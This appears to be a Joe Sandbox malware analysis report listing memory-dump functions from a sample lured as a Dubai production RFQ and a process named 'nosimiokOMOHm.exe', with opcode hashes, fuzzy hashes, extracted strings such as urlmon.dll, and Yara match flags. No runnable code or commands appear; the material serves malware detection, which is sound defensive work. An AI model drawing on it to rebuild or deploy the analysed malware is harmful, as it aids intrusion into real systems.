Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e82bd746f6b534a0c254b0daf3d1aaefbc10ae4883f25ccaed2145926d7f98d
Instruction ID: 78ddadc94764b0498923c2ce9a7c0defe5020dfedb2faef7c38d14499a665376
Opcode Fuzzy Hash: 3e82bd746f6b534a0c254b0daf3d1aaefbc10ae4883f25ccaed2145926d7f98d
Instruction Fuzzy Hash: 6290023120150412D64065595D087470009D7D0302F52C415A9164695EC675C8917531

Function 01642ED0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b603a531e723c4982f41f099aa938b7ae865ec9d1d0ef96dfb2c2ac71fac8cb5
Instruction ID: bf84ef6bab2066d8a13f45e5858c0cac9f454972423f38ab1d746a464165f694
Opcode Fuzzy Hash: b603a531e723c4982f41f099aa938b7ae865ec9d1d0ef96dfb2c2ac71fac8cb5
Instruction Fuzzy Hash: DD90022160110052468075699D449074009FBE1211B52C525A4998690DC56988656665

Function 01642EB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a7061d298be7e4190a6442df86661f79116c9e95df5e5cf9a30d3952c656f9
Instruction ID: b7e1c0917c70cd82a68c83f2a3b4e0d97bf37629bc52d760cbc7825ba5c1f7eb
Opcode Fuzzy Hash: 37a7061d298be7e4190a6442df86661f79116c9e95df5e5cf9a30d3952c656f9
Instruction Fuzzy Hash: 1B90023120150412D64065595D1470B0009D7D0302F52C415A5164695DC63588517571

Function 01642E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc7cbf3514ee3dab0bc8dcecf02e0519cb09af15997887d4e451008fc0bcab7
Instruction ID: 0ce78d8e8fc8d111533b03d9387397aa47052f25b7aedbe5d07dec933f0e673a
Opcode Fuzzy Hash: fcc7cbf3514ee3dab0bc8dcecf02e0519cb09af15997887d4e451008fc0bcab7
Instruction Fuzzy Hash: DD90026121110052D644655959047070049D7E1201F52C416A6154694CC5398C616125

Function 01642B20 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 1518c44036f3fd36c9ffb854b72331f34f8dac0da977310f270f1e2c71812f93
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01637550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01674530
Execute=1, xrefs: 0167451E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01674460
CLIENT(ntdll): Processing section info %ws..., xrefs: 01674592
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0167454D
ExecuteOptions, xrefs: 016744AB
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01674507

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 2a7de0cb6470e1cf10eeec118f34d2eb4f56b564b11a709f022f384fb2aaa9a6
Instruction ID: 1adc133ce401b2ed8dde0256138a105fffcef8d99ddbcfa5e9616592d2d4201c
Opcode Fuzzy Hash: 2a7de0cb6470e1cf10eeec118f34d2eb4f56b564b11a709f022f384fb2aaa9a6
Instruction Fuzzy Hash: 31516AB1A0021A7BEF25AB98DC99FED37A9FF54310F0404ADD605A72C0EB709A41CF64

Function 01609046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01609095
$, xrefs: 016090B1
@w`w, xrefs: 0166245B

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: $$@$@w`w
API String ID: 0-2042856498
Opcode ID: 0304334a5ea224b91222fe149f36f65d10fb3f2bfb918b97fa3d868f01003aff
Instruction ID: 8ef6bbe87e6d57a106d8496f2eae3e3a95dc135def764f1c70512bce17c39930
Opcode Fuzzy Hash: 0304334a5ea224b91222fe149f36f65d10fb3f2bfb918b97fa3d868f01003aff
Instruction Fuzzy Hash: 95813A71D012699BDB35CF54CC55BEEB7B9AB08714F0441EAEA0AB7280D7309E85CFA4

Analysis Process: nosimiokOMOHm.exePID: 4240, Parent PID: 8952COMMON

Executed Functions

Function 02C4509B Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fdbb9ceedf2a1f532305052efa770d9a578e694eafdab972143dce76fd70ff2
Instruction ID: f3f56d90ff2a9dedf036752f59fc37c875b6c19bb0c6706c41f27f993d412489
Opcode Fuzzy Hash: 5fdbb9ceedf2a1f532305052efa770d9a578e694eafdab972143dce76fd70ff2
Instruction Fuzzy Hash: 4431C8516583F14ED31E436D08BDA75AFD18E5720178EC2EEDADA5F2F3C4848408D3A1

Function 02C4479C Relevance: 39.1, Strings: 31, Instructions: 397COMMON

Download Yara Rule

Strings

,, xrefs: 02C447B6
w], xrefs: 02C44B85
i, xrefs: 02C44AD1
}r, xrefs: 02C44B9B
e, xrefs: 02C44B2C
65, xrefs: 02C448E7
\=, xrefs: 02C4492D
V, xrefs: 02C449D7
8, xrefs: 02C448B5
K, xrefs: 02C44966
v, xrefs: 02C44AD8
W, xrefs: 02C44AC3
%", xrefs: 02C44C16
c, xrefs: 02C449FF
{, xrefs: 02C4485F
d, xrefs: 02C44952
l@, xrefs: 02C448F1
`, xrefs: 02C449E1
O, xrefs: 02C447DE
t7, xrefs: 02C44A31
G*, xrefs: 02C44A27
r3, xrefs: 02C447FC
*, xrefs: 02C44B18
4, xrefs: 02C447C0
F, xrefs: 02C4497A
u@, xrefs: 02C44AFD
_, xrefs: 02C4495C
,, xrefs: 02C447F2
4B, xrefs: 02C44AF3
4B, xrefs: 02C44FD6
h, xrefs: 02C44A9F

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: %"$*$,$,$4$4B$4B$65$F$G*$K$O$V$W$\=$_$`$c$e$h$i$l@$r3$t7$u@$v$w]${$}r$8$d
API String ID: 0-2673274993
Opcode ID: d9fb38f8fec550ccbe91e97fdfce0836b1e1eb1d662c6be295c1fbb0e63acc7c
Instruction ID: ca05fc54f29fef73c61282482dc763c54d8cc37f3563469d1fb44e4c7ebf168e
Opcode Fuzzy Hash: d9fb38f8fec550ccbe91e97fdfce0836b1e1eb1d662c6be295c1fbb0e63acc7c
Instruction Fuzzy Hash: 5B3290B0D05269CBEB29CF45C9947EEBBB1BB59308F1081D9C5496B280CBB65EC9CF44

Function 02C523BC Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

6, xrefs: 02C52451
s, xrefs: 02C52443
O, xrefs: 02C5244A
S, xrefs: 02C5243C
\, xrefs: 02C52458

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: 2300ad4ac272e6198ff4bb7f8a6c3877b8a466a1905ff53d4bb2dcb521698cf1
Instruction ID: b2a1bb1242f76e76ccaa4400a7eafe974f5fb95f6607fc692667749a8b59bf8f
Opcode Fuzzy Hash: 2300ad4ac272e6198ff4bb7f8a6c3877b8a466a1905ff53d4bb2dcb521698cf1
Instruction Fuzzy Hash: 6F519FB2D14228AADB10DB94DC88BFFB3B8EF84314F444199ED0856140E7719A48DFE2

Function 02C5F71C Relevance: 2.6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

xk>, xrefs: 02C5F760
<%, xrefs: 02C5F775

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: <%$xk>
API String ID: 0-1156761195
Opcode ID: 4b5b94d3a24f42b383c7f1cea45b49c54df14146fcbd352a67fb7d16f8279566
Instruction ID: 524ecc6e39368228ee0ea954bd2dd74ce3b10a3cdd3a37e2b69a6bf3e321d840
Opcode Fuzzy Hash: 4b5b94d3a24f42b383c7f1cea45b49c54df14146fcbd352a67fb7d16f8279566
Instruction Fuzzy Hash: 4521F1B6D11118AF9B00DFA9D9419EFBBF9EF49214F04466AE915E7200E7709A04CFE0

Function 02C60A5C Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

$t, xrefs: 02C60AA7

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: $t
API String ID: 0-3881387644
Opcode ID: 7d202d7532fb81fe0cacc0bb9b4364a45c27167e9f42c5c1893e26100b29fac2
Instruction ID: e83ff170967496fac2f2e3811bd481c4e7cafd35f957066aa9199eb630422ab3
Opcode Fuzzy Hash: 7d202d7532fb81fe0cacc0bb9b4364a45c27167e9f42c5c1893e26100b29fac2
Instruction Fuzzy Hash: D311FCB6D11218AFCB40DFA9D9409EEB7F9FF48200F10456AE919E7200E7745A15CFA0

Function 02C3E2DD Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f16e2db3bddb0e06d1affeb67c79a7b80b2489a95d3c8002e8efbcacebbeb72
Instruction ID: 0983df91c0618e605991daa38e2af67130468119b8ca4da972521d2aaee37911
Opcode Fuzzy Hash: 5f16e2db3bddb0e06d1affeb67c79a7b80b2489a95d3c8002e8efbcacebbeb72
Instruction Fuzzy Hash: 02413DB1D11218AFDB04CF99C885AEEBBBCEF49710F10455AFA18E7240E7B09641CFA4

Function 02C62CFC Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3848e60f9751e12c3e82a8f062ef10a29f28c9a0790bb7b9ef9c498b61f569
Instruction ID: 2bd32d5028150a4aa6cfde162a5bc12b090e70d0f8e96c6ab9f077066f4d4435
Opcode Fuzzy Hash: 4b3848e60f9751e12c3e82a8f062ef10a29f28c9a0790bb7b9ef9c498b61f569
Instruction Fuzzy Hash: A731E4B5A00608ABDB14DF98DC85EEFB7B9EF8D300F108509F918A7240E774A911CBA5

Function 02C635FC Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36011b161a65d2afdc82876cbc341a8f56dbade1d8e8474143b865a5e8157e5b
Instruction ID: 570751208866be1fffc82cea562b3083092dc28217e403598cb918ab1e6da749
Opcode Fuzzy Hash: 36011b161a65d2afdc82876cbc341a8f56dbade1d8e8474143b865a5e8157e5b
Instruction Fuzzy Hash: 7921E7B5A00609AFDB24DFA8DC85EEF77B9EF89710F104509FD18A7280D770A911CBA5

Function 02C521FC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd23d0ceaa4f70ec8d5f2e5816dfbf7109a40c81375179293b0f151a1cc07dd4
Instruction ID: 05da271cf7fe5432a1c5d730cb5361eb1c53c19a1a8bffb5cdf1c5fd1707dc20
Opcode Fuzzy Hash: bd23d0ceaa4f70ec8d5f2e5816dfbf7109a40c81375179293b0f151a1cc07dd4
Instruction Fuzzy Hash: 861173B23802057AF7209A558C87FAB775D9F84F60F244015FF08AF2C1D6B4F8159AB9

Function 02C62B1C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408fe7cc289b1aaae1beff648c9fa6023de4feee205efbd3bff4b2ccd0439901
Instruction ID: 4eb4779e443bde2a1a04c1c258c19cf3962044c8c8341c75e56709f585253fec
Opcode Fuzzy Hash: 408fe7cc289b1aaae1beff648c9fa6023de4feee205efbd3bff4b2ccd0439901
Instruction Fuzzy Hash: 19115E71A04318ABE724EB68DC85FBB77BDEF89710F00490DF91867280D7706911CBA5

Function 02C6299C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b0daec860233d46f227669e6b62e27180aee6ab4db3158cb158ab02579b6c7
Instruction ID: 6637d23e4208c1daf5bda2d19587ed0c9c20aaf43d57ba89efa53e3dff2a399c
Opcode Fuzzy Hash: 02b0daec860233d46f227669e6b62e27180aee6ab4db3158cb158ab02579b6c7
Instruction Fuzzy Hash: 7E115E71600308ABE724EFA8DC85FAB77BDEF89710F004509FD19A7280D7706905CBA5

Function 02C6394C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8d493a99e06d2e609a5363873c570c59ed971d8598f1f719906239617a3685
Instruction ID: 86d9c41c8e9d07fee67046cfafba15f7c965c8c70208408451a12dc95343ecc8
Opcode Fuzzy Hash: cc8d493a99e06d2e609a5363873c570c59ed971d8598f1f719906239617a3685
Instruction Fuzzy Hash: 170184B6214509BFCB54DE99DC80EEB77BDAF8C754F518108BA1993241D630EC518BA4

Function 02C5F68C Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e1cb5df143963398d85ffdc3bdc6675db13dc9caec7707e5f470beebd44f79e
Instruction ID: 4f2dfd0a331df45ed4929b75eec9ea7bb657257a1ad415c81bdc5c4ddd8bb47f
Opcode Fuzzy Hash: 9e1cb5df143963398d85ffdc3bdc6675db13dc9caec7707e5f470beebd44f79e
Instruction Fuzzy Hash: D50129B2C11218AFCB40DFE8D840AEEBBF9AB48204F14456ED809F3200F7704A048FA1

Function 02C3E433 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 691ffb664fc97713c47e92a470890b13668ee6165b5925deda6485959ae8be1c
Instruction ID: ec5a1145c59b73bb6e4ec506adfb91d0a006e8b5b912d8b591ae6a15e111cf4b
Opcode Fuzzy Hash: 691ffb664fc97713c47e92a470890b13668ee6165b5925deda6485959ae8be1c
Instruction Fuzzy Hash: 76F082B36142565BE7105AADBC84B9AB7DCEB8C334F280622FD1CCA281E631D85587A5

Function 02C62C1C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffd3da63c8079a4beeb676df965a93b4e3e51d15d3dbe6c004dce789e186eb1b
Instruction ID: f69881d351e40161579669046559bbafe30ca54347c84404f2baf5de4c220297
Opcode Fuzzy Hash: ffd3da63c8079a4beeb676df965a93b4e3e51d15d3dbe6c004dce789e186eb1b
Instruction Fuzzy Hash: 1EF0F8752002047BC714EE99DC81EAB77BDEF89714F004409BA1897241D670B9118BB4

Function 02C5231C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc84cc6ce4685be0d4ad46fc62284313a2e7392da998ddc9dedda31c2de62930
Instruction ID: 91f42536a521d5dc315eb32331f658dfb2400cf31f92aa330a898841c8c03011
Opcode Fuzzy Hash: dc84cc6ce4685be0d4ad46fc62284313a2e7392da998ddc9dedda31c2de62930
Instruction Fuzzy Hash: 70F08271905209EBDB14CF64D881BDDBBB8EB44320F1043A9EC299B2C0D63497918B86

Function 02C6387C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c7a0dcd4557c6a70790a87367f7d26f466e41790c9ae8fb8b689b1ea29fd940
Instruction ID: 8ea1b94c248be60d148be714f00e489db6726b0ddb540b908a0c765b92f466c5
Opcode Fuzzy Hash: 2c7a0dcd4557c6a70790a87367f7d26f466e41790c9ae8fb8b689b1ea29fd940
Instruction Fuzzy Hash: 4AE0C2B62102047BD624EE99DC45EAB77ADEF89714F404819BA08A7241D770BD10CBB4

Function 02C656DC Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e9ba2d18b4d14e6171a66d7644f19c97b7ba4d4004e2bcfa0c3160fbdb284a3
Instruction ID: 2e42f0f904163785d3412f4bcd8fdf093cab12dfcc623c6d1110d3c74a0822e5
Opcode Fuzzy Hash: 7e9ba2d18b4d14e6171a66d7644f19c97b7ba4d4004e2bcfa0c3160fbdb284a3
Instruction Fuzzy Hash: EBE04F72A1121467D230558A9C4DFAB776DCBC5FA0F590165FE089B341E671E90086E4

Function 02C6356C Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baff932895ef524f9b8537ce661c467f337dfa349f09b638fbb3483684aaee24
Instruction ID: b0a972db8979e5d158fd5c7b917af7351e726bef41db442d210835cc21abd913
Opcode Fuzzy Hash: baff932895ef524f9b8537ce661c467f337dfa349f09b638fbb3483684aaee24
Instruction Fuzzy Hash: 8BE0463A2002047BC620EA6ADC40EAB77ADDBC9714F444419FA08A7241CB71B901CBA0

Function 02C5231B Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21aaf7e70609453e8202ea287582d8e459cf6f3802f85cf694253d6407169b97
Instruction ID: 0f3a2714e62f1d3c338d35c75480cacba9a7ebcf69e6d235d9d6a24ac3698232
Opcode Fuzzy Hash: 21aaf7e70609453e8202ea287582d8e459cf6f3802f85cf694253d6407169b97
Instruction Fuzzy Hash: E8E09271915108EADB04CFA0E580BADB7A8DB44310F1487AEEC29CB280D639C781D785

Non-executed Functions

Function 02C4E0C3 Relevance: 51.4, Strings: 41, Instructions: 171COMMON

Download Yara Rule

Strings

@@@@, xrefs: 02C4E2A7
@@@@, xrefs: 02C4E2CA
@@@@, xrefs: 02C4E292
@@@@, xrefs: 02C4E23E
@@@@, xrefs: 02C4E28B
@@@@, xrefs: 02C4E268
@@@@, xrefs: 02C4E245
@@@@, xrefs: 02C4E2D1
@@@@, xrefs: 02C4E222
@@@@, xrefs: 02C4E237
@@@@, xrefs: 02C4E2BC
@@@@, xrefs: 02C4E261
@@@@, xrefs: 02C4E284
@@@@, xrefs: 02C4E27D
@@@@, xrefs: 02C4E276
@@@@, xrefs: 02C4E24C
@@@@, xrefs: 02C4E2F4
@@@@, xrefs: 02C4E2D8
@@@@, xrefs: 02C4E1C1
)*+,, xrefs: 02C4E1F3
@@@@, xrefs: 02C4E2C3
123@, xrefs: 02C4E207
@@@@, xrefs: 02C4E229
@@@@, xrefs: 02C4E230
@@@@, xrefs: 02C4E2ED
-./0, xrefs: 02C4E1FD
@@@@, xrefs: 02C4E2AE
@@@@@@@@, xrefs: 02C4E30B
@@@@, xrefs: 02C4E2E6
@@@@, xrefs: 02C4E21B
@@@@, xrefs: 02C4E211
@@@@, xrefs: 02C4E2B5
@@@@, xrefs: 02C4E2DF
@@@@, xrefs: 02C4E2A0
!"#$, xrefs: 02C4E1DF
@@@@, xrefs: 02C4E253
@@@@, xrefs: 02C4E25A
@@@@, xrefs: 02C4E299
@@@@, xrefs: 02C4E26F
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@, xrefs: 02C4E33F
%&'(, xrefs: 02C4E1E9

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
API String ID: 0-3248090998
Opcode ID: 3772c3d1885b728335d271285491acd730840efff2aec2af1b3bcdfca6c61778
Instruction ID: 7927422bc8416909eb54015b0e455b349e1390f02ef2d81dede2ba95544b12d7
Opcode Fuzzy Hash: 3772c3d1885b728335d271285491acd730840efff2aec2af1b3bcdfca6c61778
Instruction Fuzzy Hash: 5A91FEF08052A98ECB118F5595603DFBF71BB95204F1581E9C6AA7B243C3BE4E45DF50

Function 02C5CBFC Relevance: 34.0, Strings: 27, Instructions: 264COMMON

Download Yara Rule

Strings

), xrefs: 02C5CC9E
v, xrefs: 02C5CC30
%, xrefs: 02C5CDE2
B, xrefs: 02C5CD11
5, xrefs: 02C5CCA8
., xrefs: 02C5CE97
s, xrefs: 02C5CC8A
), xrefs: 02C5CC44
w, xrefs: 02C5CCB6
urlmon.dll, xrefs: 02C5CE3E, 02C5CE41
F, xrefs: 02C5CCD9
T, xrefs: 02C5CCE7
m, xrefs: 02C5CCAF
g, xrefs: 02C5CC6C
i, xrefs: 02C5CE9E
u, xrefs: 02C5CC76
$, xrefs: 02C5CC94
H, xrefs: 02C5CCCB
}, xrefs: 02C5CC80
J, xrefs: 02C5CD18
F, xrefs: 02C5CCC4
Q, xrefs: 02C5CCD2
>, xrefs: 02C5CC3A
$, xrefs: 02C5CC58
h, xrefs: 02C5CC26
}, xrefs: 02C5CC62
E, xrefs: 02C5CCBD

Memory Dump Source

Source File: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Offset: 02990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2990000_nosimiokOMOHm.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
API String ID: 0-1002149817
Opcode ID: caa79d620d4c0d537a26bba45b2cd16f547261ba3bd2d998ccba241479292ce1
Instruction ID: 177b8cfb96af1f59666acc0339a629c803a0da7f55a56f07e2b100a21c387e44
Opcode Fuzzy Hash: caa79d620d4c0d537a26bba45b2cd16f547261ba3bd2d998ccba241479292ce1
Instruction Fuzzy Hash: E9C12EB1D113689EDB60DFA4CC44BEEBBB9AF44304F1081D9D50CAB241E7B54A88DFA5

Function 02C3E099 Relevance: 33.8, Strings: 27, Instructions: 57COMMON

Download Yara Rule

Strings

4+4., xrefs: 02C3E1BC, 02C3E1CB
:B3:, xrefs: 02C3E10C
WV6:, xrefs: 02C3E13D
|{hs, xrefs: 02C3E18A
/4*:, xrefs: 02C3E0BC
